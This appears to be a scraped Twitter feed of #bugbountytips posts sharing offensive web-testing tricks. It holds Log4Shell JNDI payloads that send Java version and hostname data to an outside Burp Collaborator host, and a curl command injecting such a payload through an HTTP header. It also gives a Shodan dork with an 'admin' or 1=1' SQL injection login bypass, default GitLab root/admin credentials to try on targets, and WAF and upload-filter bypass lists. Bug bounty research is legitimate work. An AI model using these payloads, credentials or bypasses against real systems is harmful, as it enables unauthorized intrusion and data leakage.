-
Verify Java Version, if not vulnerable don't bother and go to the next target! How? ${jndi:ldap://${env:JAVA_VERSION}.5ou7zt0bj640uqc0bsy1hvyrpiv8jx.burpcollaborator.net}
#bugbountytips pic.twitter.com/ZHxYVKD1nsShow this thread -
trying to test every header of a website for
#log4j? Use BurpSuite and the Pitchfork attack in the Intruder and set both payloads to the header values: ${jndi:ldap://${hostName}.§§.${sys:java.version}.cb.io} now you know the vuln header :)#bugbounty#bugbountytips pic.twitter.com/E2TTRhRVlT -
log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts
#log4j#Log4Shell#infosec#log4j2#bugbountytips#bugbountyhttps://github.com/fullhunt/log4j-scan … -
~Admin Panel Accessed via sqli
#bugbountytips@0xmahmoudJo0 1- Search for Login panels through@shodanhq with this dork: org:"TARGET" http.title:"login" 2- Bypass login with old way: admin' or 1=1#BugBounty#bugbountytip#cybersecurity#sqlipic.twitter.com/Tu4rn9gS0u -
Apache Log4j RCE Attack Flow - ExploitWareLabs
#bugbountytips#bugbounty#log4j#CVE#cybersecurity#infosecpic.twitter.com/MJY9l2unU9 -
I just published a new write-up at Medium! How I found a IDOR issue in 5 mins? https://medium.com/@alp0x01/how-i-found-a-idor-issue-in-5-mins-2c6a2805c08c … Please ask through direct message if you have any question about bugbounty or information security! Have a great day y'all. :)
#bugbounty#infosec#hackerone#bugbountytips pic.twitter.com/51YYWizPpH -
Grafana v8.2.6 unauthorized read of arbitrary files shodan: shodan search --color 'app="Grafana"' --fields ip_str
#cybersecurity#bugbounty#bugbountytips#infosec#pentest#grafana#0day#vulnerabilitypic.twitter.com/rcxIQ5oi4E -
#Pro Cloudflare SQLi Bypass by 'Cyber Guy'#WAFBypass#SQLi#BugBounty#BugBountyTip#BugBountyTips pic.twitter.com/EsvOOXoMVs -
#Pro Bypass file upload restriction by 'MikeChan' 1. Line Termination Trick 2. Content-Disposition Overflow 3. File Name Overflow 4. Duplicated Line 5. Double Extension Another thing comes to your mind? Comment it :)#FileUpload#BugBounty#BugBountyTip#BugBountyTips pic.twitter.com/UiA4s6mSJn -
#bugbountytips If you found a GitLab instance, try to login as root/admin with those credentials:- Username: root & pass: 5iveL!fe Username: admin & Pass: 5iveL!fe You can find it with#shodan : org:"Target" http.title:"GitLab"#CyberSecurity#BugBountypic.twitter.com/SphXZ7TU00 -
Don't forget to use the handy Burp Proxy Match and Replace rules for finding
#Log4Shell, while browsing targets. Pretty simple but effective.#bugbountytips#bugbounty#infosec#cybersecurity#log4jpic.twitter.com/HwRK0NxpaCShow this thread -
Best Tip to Detect XSS with Dalfox The Command:- https://bit.ly/3dostfc
#bugbountytips#infosec#BugBounty#hackeronepic.twitter.com/KYepeMKoCP -
#bugbountytips crawl hidden parameters from source like <input> tag and js variable and scan with jaeles https://github.com/ghsec/ghsec-jaeles-signatures/tree/master/fuzz-param …pic.twitter.com/SGRMui9wooShow this thread -
solo vengo a confirmarles que el
@burpbounty se paga solo // I just come to confirm that the https://bit.ly/3IMCKAk pays for itself#bugbountytips#hackingpic.twitter.com/mGhrRPwsge -
Here's a little thing I picked up today. If you have a list of urls and want to throw them into burp and get the responses, try this. cat urls.txt | fff -S -o resp --proxy <proxy> -H "Cookie: <yourcookies>" I took this from Arjun -> Burp, very fast!
#bugbountytips#Pentestingpic.twitter.com/BV85bUpu1aShow this thread -
People getting paid 4 digit bounties for log4j RCE and here I am who didn't even started looking for it. Is this normal or am I missing huge payouts?
@payloadartist@therceman#bugbounty#bugbountytips -
If you have a Struts2 target, you can try to find if its vulnerable to
#Log4Shell curl -vv -H "If-Modified-Since: \${jndi:ldap://localhost:80/abc}" http://localhost:8080/struts2-showcase/struts/utils.js#bugbountytips#log4jRCE#bugbounty#infosec#cybersecurity#redteam 1/npic.twitter.com/7kQwoegU3rShow this thread
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.